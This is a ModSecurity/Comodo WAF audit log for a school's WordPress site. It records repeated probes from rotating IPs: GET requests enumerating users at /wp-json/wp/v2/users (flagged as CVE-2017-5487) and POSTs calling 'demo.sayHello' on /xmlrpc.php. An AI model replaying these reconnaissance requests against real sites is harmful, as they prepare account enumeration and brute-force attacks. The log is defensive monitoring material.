--ab77e010-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ab77e010-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab77e010-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502655169907 3480 (- - -) Stopwatch2: 1747502655169907 3480; combined=1824, p1=555, p2=1238, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab77e010-Z-- --bbcf1f01-A-- [18/May/2025:00:24:23 +0700] aCjGR3yxdQCiyU1ENFcfzwAAAAA 103.236.140.4 36836 103.236.140.4 8181 --bbcf1f01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.91 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bbcf1f01-C-- demo.sayHello --bbcf1f01-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbcf1f01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502663502921 14067 (- - -) Stopwatch2: 1747502663502921 14067; combined=12265, p1=1739, p2=9989, p3=125, p4=213, p5=123, sr=69, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbcf1f01-Z-- --a7054f33-A-- [18/May/2025:00:28:07 +0700] aCjHJ-m4kjNN-hEbWjIoJwAAAFM 103.236.140.4 52304 103.236.140.4 8181 --a7054f33-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a7054f33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7054f33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502887319810 2487 (- - -) Stopwatch2: 1747502887319810 2487; combined=1150, p1=381, p2=743, p3=0, p4=0, p5=26, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7054f33-Z-- --cc97c70b-A-- [18/May/2025:00:28:13 +0700] aCjHLXyxdQCiyU1ENFclgAAAAAU 103.236.140.4 52758 103.236.140.4 8181 --cc97c70b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.179.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.179.65 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cc97c70b-C-- demo.sayHello --cc97c70b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc97c70b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502893850466 7093 (- - -) Stopwatch2: 1747502893850466 7093; combined=5348, p1=790, p2=4233, p3=44, p4=57, p5=126, sr=69, sw=98, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc97c70b-Z-- --15e73b32-A-- [18/May/2025:00:34:21 +0700] aCjInQTOsBn9MSWb6WJoJwAAAIA 103.236.140.4 48700 103.236.140.4 8181 --15e73b32-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15e73b32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15e73b32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503261333308 3682 (- - -) Stopwatch2: 1747503261333308 3682; combined=1949, p1=564, p2=1352, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15e73b32-Z-- --39e10864-A-- [18/May/2025:00:34:29 +0700] aCjIpem4kjNN-hEbWjIysAAAAEU 103.236.140.4 49120 103.236.140.4 8181 --39e10864-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --39e10864-C-- demo.sayHello --39e10864-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --39e10864-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503269431733 9140 (- - -) Stopwatch2: 1747503269431733 9140; combined=7427, p1=1225, p2=5899, p3=47, p4=63, p5=121, sr=61, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39e10864-Z-- --71974173-A-- [18/May/2025:00:36:19 +0700] aCjJExKi5m5upc8uMd68dQAAANE 103.236.140.4 56984 103.236.140.4 8181 --71974173-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71974173-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71974173-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503379118074 3030 (- - -) Stopwatch2: 1747503379118074 3030; combined=1403, p1=443, p2=928, p3=0, p4=0, p5=32, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71974173-Z-- --286d3958-A-- [18/May/2025:00:36:28 +0700] aCjJHBKi5m5upc8uMd68qgAAAM0 103.236.140.4 57668 103.236.140.4 8181 --286d3958-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --286d3958-C-- demo.sayHello --286d3958-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --286d3958-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503388080931 6602 (- - -) Stopwatch2: 1747503388080931 6602; combined=4939, p1=634, p2=4045, p3=50, p4=65, p5=87, sr=59, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --286d3958-Z-- --ce7d880a-A-- [18/May/2025:00:37:54 +0700] aCjJcum4kjNN-hEbWjI3oQAAAE8 103.236.140.4 35190 103.236.140.4 8181 --ce7d880a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce7d880a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce7d880a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503474780204 2491 (- - -) Stopwatch2: 1747503474780204 2491; combined=1010, p1=355, p2=630, p3=0, p4=0, p5=24, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce7d880a-Z-- --37d1c739-A-- [18/May/2025:00:38:01 +0700] aCjJeQTOsBn9MSWb6WJuKAAAAIM 103.236.140.4 35624 103.236.140.4 8181 --37d1c739-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --37d1c739-C-- demo.sayHello --37d1c739-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --37d1c739-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503481954661 6052 (- - -) Stopwatch2: 1747503481954661 6052; combined=4878, p1=532, p2=4108, p3=38, p4=49, p5=93, sr=56, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37d1c739-Z-- --c721ca1c-A-- [18/May/2025:00:39:10 +0700] aCjJvgTOsBn9MSWb6WJv-QAAAI4 103.236.140.4 40714 103.236.140.4 8181 --c721ca1c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c721ca1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c721ca1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503550568535 2531 (- - -) Stopwatch2: 1747503550568535 2531; combined=1195, p1=398, p2=756, p3=0, p4=0, p5=41, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c721ca1c-Z-- --dbc0e101-A-- [18/May/2025:00:39:15 +0700] aCjJwwTOsBn9MSWb6WJwLQAAAII 103.236.140.4 41136 103.236.140.4 8181 --dbc0e101-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.42.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.42.157 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbc0e101-C-- demo.sayHello --dbc0e101-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbc0e101-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503555981852 5478 (- - -) Stopwatch2: 1747503555981852 5478; combined=4182, p1=573, p2=3372, p3=40, p4=42, p5=93, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbc0e101-Z-- --9c00812a-A-- [18/May/2025:00:39:56 +0700] aCjJ7BKi5m5upc8uMd7CwQAAAMM 103.236.140.4 43712 103.236.140.4 8181 --9c00812a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c00812a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c00812a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503596150969 1905 (- - -) Stopwatch2: 1747503596150969 1905; combined=1077, p1=344, p2=708, p3=0, p4=0, p5=25, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c00812a-Z-- --bcf6907f-A-- [18/May/2025:00:40:02 +0700] aCjJ8nyxdQCiyU1ENFc2rQAAAAk 103.236.140.4 44192 103.236.140.4 8181 --bcf6907f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bcf6907f-C-- demo.sayHello --bcf6907f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf6907f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503602881067 7612 (- - -) Stopwatch2: 1747503602881067 7612; combined=5755, p1=774, p2=4694, p3=48, p4=62, p5=105, sr=73, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf6907f-Z-- --5426fa2a-A-- [18/May/2025:00:40:05 +0700] aCjJ9QTOsBn9MSWb6WJxXAAAAI8 103.236.140.4 44358 103.236.140.4 8181 --5426fa2a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5426fa2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5426fa2a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503605454013 2469 (- - -) Stopwatch2: 1747503605454013 2469; combined=1226, p1=401, p2=790, p3=0, p4=0, p5=35, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5426fa2a-Z-- --f93cc817-A-- [18/May/2025:00:40:12 +0700] aCjJ_BKi5m5upc8uMd7DPwAAAMQ 103.236.140.4 44888 103.236.140.4 8181 --f93cc817-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.172 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f93cc817-C-- demo.sayHello --f93cc817-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f93cc817-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747503612253957 8272 (- - -) Stopwatch2: 1747503612253957 8272; combined=6786, p1=570, p2=5867, p3=53, p4=64, p5=139, sr=98, sw=93, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f93cc817-Z-- --fe7cf32a-A-- [18/May/2025:00:40:45 +0700] aCjKHQTOsBn9MSWb6WJyhAAAAII 103.236.140.4 47412 103.236.140.4 8181 --fe7cf32a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe7cf32a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe7cf32a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747503645550760 2790 (- - -) Stopwatch2: 1747503645550760 2790; combined=1646, p1=520, p2=1098, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 